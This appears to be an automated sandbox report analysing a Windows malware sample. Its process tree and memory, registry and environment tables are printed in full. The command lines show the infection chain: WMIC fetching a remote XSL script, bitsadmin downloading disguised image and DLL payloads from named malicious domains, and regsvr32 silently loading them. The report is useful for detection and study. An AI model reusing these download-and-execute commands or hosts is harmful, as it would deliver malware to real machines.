b365a249...0b07

Process Overview

»

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x984	Analysis Target	High (Elevated)	cmd.exe	"C:\Windows\system32\cmd.exe" /k start /MIN C:\Windows\\system32\\wbem\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh" && exit	-
#2	0x9a4	Child Process	High (Elevated)	wmic.exe	C:\Windows\\system32\\wbem\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh"	#1
#6	0xa98	Child Process	High (Elevated)	wmic.exe	"C:\Windows\system32\wbem\WMIC.exe" os get XBRSEWYL, freephysicalmemory /format:"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641"	#2
#7	0xaf0	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737 C:\ProgramData\tempa\marxvxinhhma.jpg	#6
#8	0xb74	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307 C:\ProgramData\tempa\marxvxinhhmb.jpg	#6
#9	0xba8	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218 C:\ProgramData\tempa\marxvxinhhmc.jpg	#6
#10	0xbd8	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560 C:\ProgramData\tempa\marxvxinhhmdwwn.gif	#6
#11	0xc08	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672 C:\ProgramData\tempa\marxvxinhhmdx.gif	#6
#12	0xc38	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807 C:\ProgramData\tempa\marxvxinhhme.jpg	#6
#13	0xc68	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089 C:\ProgramData\tempa\marxvxinhhmf.jpg	#6
#14	0xc98	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574 C:\ProgramData\tempa\marxvxinhhmg.gif	#6
#15	0xcd4	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544 C:\ProgramData\tempa\marxvxinhhmgx.gif	#6
#16	0xd18	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115 C:\ProgramData\tempa\marxvxinhhmxa.gif	#6
#17	0xd74	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106 C:\ProgramData\tempa\marxvxinhhmxb.gif	#6
#18	0xda4	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log C:\ProgramData\tempa\r1.log	#6
#19	0xdd4	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159 C:\ProgramData\tempa\marxvxinhhm98.dll	#6
#20	0xe58	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521 C:\ProgramData\tempa\marxvxinhhm64.dll	#6
#21	0xe8c	Child Process	High (Elevated)	bitsadmin.exe	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238 C:\ProgramData\xxx6000137xx\marxvxinhhm64528113361.dll	#6
#22	0xec0	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /k echo %time% && timeout 5 > NUL && exit	#6
#23	0xed8	Child Process	High (Elevated)	timeout.exe	timeout 5	#22
#24	0xf0c	Child Process	High (Elevated)	regsvr32.exe	"C:\Windows\System32\regsvr32.exe" /s "C:\ProgramData\xxx6000137xx\marxvxinhhm64528113361.dll"	#6
#25	0xf18	Child Process	High (Elevated)	regsvr32.exe	"C:\Windows\System32\regsvr32.exe" /s "C:\ProgramData\tempa\marxvxinhhm64.dll"	#6
#26	0xf24	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /k echo %time% && timeout 4000 > NUL && exit	#6
#27	0xf40	Child Process	High (Elevated)	timeout.exe	timeout 4000	#26
#28	0xf48	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#29	0xf50	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#30	0xf74	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#31	0xf7c	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#32	0xf9c	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#33	0xfa4	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#34	0xfc8	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#35	0xfd0	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#36	0x854	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#37	0x824	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#38	0x8a4	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#39	0x888	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#40	0x180	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#41	0x734	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#42	0x174	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#43	0x710	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#44	0x844	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#45	0x850	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#46	0x5cc	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#47	0x1c0	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#48	0x2a8	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#49	0x80c	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#53	0x8e8	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#54	0x980	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#55	0x998	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#56	0x9b0	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#57	0x94c	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#58	0x944	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#59	0xa54	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#60	0xaa8	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#61	0xa80	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#62	0xaa0	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#63	0xae8	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#64	0xb6c	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#65	0xaf0	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25
#66	0xba0	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#24
#67	0xbb4	Child Process	High (Elevated)	userinit.exe	"C:\Windows\System32\userinit.exe"	#25

Process #1: cmd.exe

58

0

»

Information	Value
ID	#1
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\system32\cmd.exe" /k start /MIN C:\Windows\\system32\\wbem\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh" && exit
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:30, Reason: Analysis Target
Unmonitor	End Time: 00:00:35, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0x984
Parent PID	0x5f8 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 988

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000050000	0x00050000	0x00056fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	rw	-
private_0x0000000000070000	0x00070000	0x0016ffff	Private Memory	rw	-
locale.nls	0x00170000	0x001d6fff	Memory Mapped File	r	-
pagefile_0x00000000001e0000	0x001e0000	0x002a7fff	Pagefile Backed Memory	r	-
private_0x00000000002b0000	0x002b0000	0x002b0fff	Private Memory	rw	-
private_0x00000000002c0000	0x002c0000	0x002c0fff	Private Memory	rw	-
private_0x0000000000300000	0x00300000	0x003fffff	Private Memory	rw	-
pagefile_0x0000000000400000	0x00400000	0x00500fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0058ffff	Private Memory	rw	-
pagefile_0x0000000000590000	0x00590000	0x0118ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001190000	0x01190000	0x012f2fff	Pagefile Backed Memory	r	-
cmd.exe	0x4ab60000	0x4ababfff	Memory Mapped File	rwx	-
winbrand.dll	0x73270000	0x73276fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

File (15)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Windows\system32	type = file_attributes	1	Fn
Get Info	C:\Windows\System32	type = file_attributes	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	8	Fn
Open	STD_INPUT_HANDLE	-	3	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Registry (17)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 144, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

»

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\system32\wbem\WMIC.exe	os_pid = 0x9a4, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINNOACTIVE		1	Fn

Thread (1)

»

Operation	Process	Additional Information	Success	Count	Logfile
Resume	c:\windows\system32\cmd.exe	os_tid = 0x988		1	Fn

Module (8)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x4ab60000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x753aac6c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x753b3ea8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x753c2732	1	Fn

System (2)

»

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-10-22 05:26:30 (UTC)		1	Fn
Get Time	type = Ticks, time = 101041		1	Fn

Environment (12)

»

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn

Process #2: wmic.exe

67

0

»

Information	Value
ID	#2
File Name	c:\windows\system32\wbem\wmic.exe
Command Line	C:\Windows\\system32\\wbem\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:34, Reason: Child Process
Unmonitor	End Time: 00:00:59, Reason: Self Terminated
Monitor Duration	00:00:25

OS Process Information

»

Information	Value
PID	0x9a4
Parent PID	0x984 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9A8 0x 9BC 0x A40 0x A44 0x A48 0x A4C 0x A50 0x A7C 0x A80 0x A84 0x A90 0x A94 0x AA0 0x AA4

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
wmic.exe.mui	0x000e0000	0x000effff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x0012ffff	Private Memory	rw	-
private_0x0000000000130000	0x00130000	0x00130fff	Private Memory	rw	-
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00150fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	r	-
msxml3r.dll	0x00170000	0x00170fff	Memory Mapped File	r	-
private_0x0000000000180000	0x00180000	0x0018ffff	Private Memory	rw	-
rpcss.dll	0x00190000	0x001ebfff	Memory Mapped File	r	-
private_0x0000000000190000	0x00190000	0x001affff	Private Memory	-	-
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x001c0000	0x001c0fff	Memory Mapped File	r	-
pagefile_0x00000000001c0000	0x001c0000	0x001c0fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	r	-
index.dat	0x001e0000	0x001e7fff	Memory Mapped File	rw	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
pagefile_0x00000000002f0000	0x002f0000	0x003b7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003c0000	0x003c0000	0x004c0fff	Pagefile Backed Memory	r	-
index.dat	0x004d0000	0x004fbfff	Memory Mapped File	rw	-
index.dat	0x00500000	0x0050ffff	Memory Mapped File	rw	-
private_0x0000000000510000	0x00510000	0x0054ffff	Private Memory	rw	-
pagefile_0x0000000000550000	0x00550000	0x00550fff	Pagefile Backed Memory	r	-
wmiutils.dll.mui	0x00560000	0x00564fff	Memory Mapped File	rw	-
private_0x0000000000570000	0x00570000	0x005affff	Private Memory	rw	-
private_0x00000000005b0000	0x005b0000	0x0066ffff	Private Memory	rw	-
private_0x00000000005b0000	0x005b0000	0x0061ffff	Private Memory	rw	-
pagefile_0x00000000005b0000	0x005b0000	0x005cffff	Pagefile Backed Memory	rw	-
urlmon.dll.mui	0x005b0000	0x005b7fff	Memory Mapped File	rw	-
private_0x00000000005c0000	0x005c0000	0x005c0fff	Private Memory	rw	-
pagefile_0x00000000005c0000	0x005c0000	0x005c0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000005d0000	0x005d0000	0x005d0fff	Pagefile Backed Memory	rw	-
private_0x00000000005e0000	0x005e0000	0x0061ffff	Private Memory	rw	-
private_0x0000000000630000	0x00630000	0x0066ffff	Private Memory	rw	-
private_0x0000000000670000	0x00670000	0x007cffff	Private Memory	rw	-
private_0x0000000000670000	0x00670000	0x0078ffff	Private Memory	rw	-
kernelbase.dll.mui	0x00670000	0x0072ffff	Memory Mapped File	rw	-
private_0x0000000000750000	0x00750000	0x0078ffff	Private Memory	rw	-
private_0x0000000000790000	0x00790000	0x007cffff	Private Memory	rw	-
rsaenh.dll	0x007d0000	0x0080bfff	Memory Mapped File	r	-
private_0x00000000007d0000	0x007d0000	0x007fffff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x0081ffff	Private Memory	rw	-
private_0x0000000000830000	0x00830000	0x0086ffff	Private Memory	rw	-
wmic.exe	0x00890000	0x008f2fff	Memory Mapped File	rwx	-
pagefile_0x0000000000900000	0x00900000	0x014fffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01500000	0x017cefff	Memory Mapped File	r	-
private_0x00000000017d0000	0x017d0000	0x019bffff	Private Memory	rw	-
private_0x00000000017d0000	0x017d0000	0x0193ffff	Private Memory	rw	-
private_0x00000000017d0000	0x017d0000	0x018cffff	Private Memory	rw	-
private_0x0000000001900000	0x01900000	0x0193ffff	Private Memory	rw	-
private_0x0000000001980000	0x01980000	0x019bffff	Private Memory	rw	-
private_0x00000000019c0000	0x019c0000	0x01baffff	Private Memory	rw	-
private_0x00000000019c0000	0x019c0000	0x01b3ffff	Private Memory	rw	-
private_0x00000000019c0000	0x019c0000	0x01aeffff	Private Memory	rw	-
pagefile_0x00000000019c0000	0x019c0000	0x01a9efff	Pagefile Backed Memory	r	-
private_0x0000000001ab0000	0x01ab0000	0x01aeffff	Private Memory	rw	-
private_0x0000000001b00000	0x01b00000	0x01b3ffff	Private Memory	rw	-
private_0x0000000001b70000	0x01b70000	0x01baffff	Private Memory	rw	-
private_0x0000000001bb0000	0x01bb0000	0x01faffff	Private Memory	rw	-
private_0x0000000001fb0000	0x01fb0000	0x020effff	Private Memory	rw	-
private_0x0000000001ff0000	0x01ff0000	0x0202ffff	Private Memory	rw	-
private_0x0000000002060000	0x02060000	0x0209ffff	Private Memory	rw	-
private_0x00000000020b0000	0x020b0000	0x020effff	Private Memory	rw	-
private_0x0000000002130000	0x02130000	0x0216ffff	Private Memory	rw	-
private_0x0000000002180000	0x02180000	0x021bffff	Private Memory	rw	-
private_0x00000000021f0000	0x021f0000	0x0222ffff	Private Memory	rw	-
private_0x0000000002230000	0x02230000	0x0232ffff	Private Memory	rw	-
private_0x0000000002330000	0x02330000	0x024cffff	Private Memory	rw	-
private_0x0000000002330000	0x02330000	0x0244ffff	Private Memory	rw	-
private_0x00000000024c0000	0x024c0000	0x024cffff	Private Memory	rw	-
msxml3.dll	0x6d350000	0x6d482fff	Memory Mapped File	rwx	-
wmiutils.dll	0x6e3e0000	0x6e3f6fff	Memory Mapped File	rwx	-
wbemsvc.dll	0x6e450000	0x6e45efff	Memory Mapped File	rwx	-
wbemprox.dll	0x6e580000	0x6e589fff	Memory Mapped File	rwx	-
ntdsapi.dll	0x6e590000	0x6e5a7fff	Memory Mapped File	rwx	-
fastprox.dll	0x6e5b0000	0x6e645fff	Memory Mapped File	rwx	-
wbemcomn.dll	0x6e780000	0x6e7dbfff	Memory Mapped File	rwx	-
framedynos.dll	0x6f8d0000	0x6f904fff	Memory Mapped File	rwx	-
rasadhlp.dll	0x70020000	0x70025fff	Memory Mapped File	rwx	-
msvcr90.dll	0x70eb0000	0x70f52fff	Memory Mapped File	rwx	-
msoxmlmf.dll	0x71ae0000	0x71aecfff	Memory Mapped File	rwx	-
rasman.dll	0x72880000	0x72894fff	Memory Mapped File	rwx	-
rasapi32.dll	0x728a0000	0x728f1fff	Memory Mapped File	rwx	-
rtutils.dll	0x73080000	0x7308cfff	Memory Mapped File	rwx	-
sensapi.dll	0x73270000	0x73275fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
winnsi.dll	0x73d60000	0x73d66fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x73d70000	0x73d8bfff	Memory Mapped File	rwx	-
wtsapi32.dll	0x73e00000	0x73e0cfff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
nlaapi.dll	0x74070000	0x7407ffff	Memory Mapped File	rwx	-
ntmarta.dll	0x74480000	0x744a0fff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
wshtcpip.dll	0x74650000	0x74654fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
dnsapi.dll	0x749c0000	0x74a03fff	Memory Mapped File	rwx	-
mswsock.dll	0x74b00000	0x74b3bfff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
secur32.dll	0x74f80000	0x74f87fff	Memory Mapped File	rwx	-
sspicli.dll	0x74fa0000	0x74fbafff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
profapi.dll	0x75070000	0x7507afff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
ws2_32.dll	0x756c0000	0x756f4fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
normaliz.dll	0x75c60000	0x75c62fff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
nsi.dll	0x76f10000	0x76f15fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
wldap32.dll	0x77070000	0x770b4fff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
